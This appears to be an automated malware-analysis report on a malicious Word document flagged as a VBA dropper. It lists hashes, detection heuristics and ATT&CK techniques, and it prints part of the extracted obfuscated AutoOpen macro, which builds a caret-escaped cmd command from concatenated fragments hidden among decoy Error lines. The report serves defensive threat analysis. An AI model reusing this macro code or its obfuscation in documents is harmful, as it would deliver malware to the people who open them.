Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e429bf665c340744…

MALICIOUS

Office (OLE)

Size: 91.1 KB
Created: 2018-08-28 09:30:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: efa168540687071f04b2e75ebc2d1c3e
SHA-1: 3dc99be4b9a53ffa105a102b28b079dcb039d14c
SHA-256: e429bf665c3407447ba3fb8ae73b912e82c6cad6f211fa81bc9450af785cd2ff
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. The macro calls Shell(), a critical indicator of malicious intent that suggests the document is designed to download and execute a secondary payload. The presence of the 'Doc.Dropper.Valyria-6665650-0' ClamAV signature further supports its classification as a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Valyria-6665650-0 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Valyria-6665650-0
  • VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    The VBA code calls Shell()
  • AutoOpen macro (severity: high; rule: OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen macro
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium; rule: OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12002 bytes
SHA-256: 4ee5cff1227b54e1138c07da3db83c9ecedfe20f4612e071a4a68ee2e8b17500
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "GftfQPiRZId"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "TVvHWaP"
Function lWQDZBw()

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next
Error 50074 / THdOU
cBOQwUzJYk = "MD  /v" + "^:^o /" + "c  " + Chr(5 + 2 + 1 + 5 + 21) + " " + "^S^" + "et " + "^ ^  6" + "^8" + "^FE=^A^"
Error 5601 / wtdJk
   Error 50019 * 88335 / 14501 / DzdDOo
   Error 43819 * 70449 / 73934 / wuEtMS
   Error wHETpL / uvmEXG / bGAjIq * vuGKwo
   Error 5990 / HdkjP
ZspWEST = "AC" + "A^g^" + "AA^" + "IA^" + "ACA^gA^" + "A"
Error zJsXw * BiaTJ / YrLuF * URJav
WqzPtVZtH = "^IA" + "A" + "CA^g^" + "AAI^AAC" + "A^g" + "^AA^I^A" + "^AC^" + "A^" + "gAAI" + "^A^ACA" + "gA^" + "Q^f^A" + "^0H"
Error bAiUTm / qRfwja
   Error 53343 / Fviku
DHzYNHfafcq = "^A^" + "7" + "^BA^a" + "^A^" + "MG" + "A0^BQ^Y" + "^" + "A^M^G"
Error jqDUzd / kVTuQ / wsntR / uHvaF
   Error 67722 / SqjDX
   Error lSsAAG * Wqiajz
   Error IuLjBl * aJtzCO * 11284 * iXhFqw
LbXBcupTs = "A" + "9^BwOA^" + "sG^" + "A" + "^hB^Q^Z"
Error FmJIo / JljOVn * 18872 * WfQpdD
   Error 75136 / zqYdA
   Error 91055 * OlijlP
   Error DVGYo * Jlanz * qCGJZX / zIziwQ
   Error kdJiP * 92990 / XmzHp * iVKNV
EozqB = "^A^I" + "H^A^iB" + "^w^O^A^" + "8^G^Am^" + "B^QRAQC" + "^A^g^A" + "Q^b" + "AU" + "G"
Error 2243 / lnToXb * 38409 / THptXs
   Error zJJbVi * KIBUFz
   Error 17363 / qKwfDn / 13460 / 6079
piWjEMPM = "^A^" + "0^B^Q" + "S^A" + "0CA^" + "l^B^w" + "^aA8G^A"
Error 15047 * pmmPE
   Error pmYLPw * PklYXp
wlNJwWGsvIk = "2^Bg" + "bAk" + "E^A^7^" + "AQK^A^8" + "^GA^m^"
Error 67093 * ibzjYu * 33525 * JBvZRQ
   Error JCOiz * kTNhq
   Error hiNRCM / KPYAFJ / nafLH / PYmip
IDqaobhc = "BQR^" + "A^QC^A" + "gAA^L^A" + "YGA^" + "U^" + "B^" + "g^e^"
lWQDZBw = cBOQwUzJYk + ZspWEST + WqzPtVZtH + DHzYNHfafcq + LbXBcupTs + EozqB + piWjEMPM + wlNJwWGsvIk + IDqaobhc
   Error 40127 / 88680 * 10948 / GiJsj
   Error QZHmji / 83677
   Error 24710 * auUBPA * URaRu * QAuLiC
   Error UUXpdj * tHbGO
   Error SjpLuh * TkotzZ
End Function
Function rcEqw()

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next

On _
Error _
Resume _
Next
Error HVZss * HjPVWG
   Error lqDTD * 26442
   Error mOjUSq / BGzwp / 57658 / EIoUJ
   Error DAUtE / 47577
waATqiB = "AQCA^o" + "^AQ" + "^Z" + "^" + "Aw^" + "GAp^BgR" + "AQG" + "^A^" + "h^B^wb" + "^A^"
Error BUrdbi / KBITaE * bujioZ * tOjbYi
   Error KPTtk / kJYnA
   Error zYiitG / 53884
   Error JtsTGX / WHPUl
cSETwHw = "wG^A" + "^u^Bw^" + "d^A^" + "8G" + "^A" + "^E^" + "B^g^L^" + "A"
Error 36140 / 37581
   Error 400 / FSvPO
   Error KCCzQ / 55560 * OaHwQG * 46108
   Error 91359 * ERIfzO
ORSWkWjtfJ = "YE^A^D^" + "BgV^A^" + "QC" + "^" + "A^" + "7B^Qe^"
Error 89953 / 39394 / MhFTNO * CtuXCB
   Error 77267 / SKpST
   Error 24780 / UPUvo
   Error tVpCBs * XFwSf / Idwkd / kSPlF
   Error 56235 * SWrTE
TQzZoNMZU = "A" + "IH^" + "A^" + "0Bwe" + "A^kC^" + "AyB^g^U" + "A8^" + "GA^k^A" + "^A^IA4"
Error 99762 / jGKasK
   Error VujOtQ / mYjuYi * 69486 * WMjtMQ
imJHjzHHrCh = "^G" + "A^pB^" + "AI^AYG" + "^A^UB^" + "g^" + "eA^" + "QC^" + "A" + "^o^" + "AA"
Error mVGXGw / 68337 / unfnGW / OVKQOU
   Error 15659 * PLzZR / NCujp / 8596
   Error nOrzN / 71393 * 31515 * iiboW
TwHoloMnl = "a" + "^A^MGA" + "h" + "^BQ" + "^Z^A" + "I^"
Error 17832 * NzTIP / 98229 * EdhAE
   Error KjaQJu * wqIjNf
   Error 66414 / 44660
IvMMtlCXB = "H^Av" + "^" + "B^g^" + "Z^" + "AsD"
rcEqw = waATqiB + cSETwHw + ORSWkWjtfJ + TQzZoNMZU + imJHjzHHrCh + TwHoloMnl + IvMMtlCXB
   Error 24933 / ZkhOKJ
   Error 61447 / iuIOs * 69123 * IEFCar
   Error buaRHl / izhaU / iaYUq / zbHJi
End Function
Function XmwKUJnQi()

On _
Error _
Resume _
... (truncated)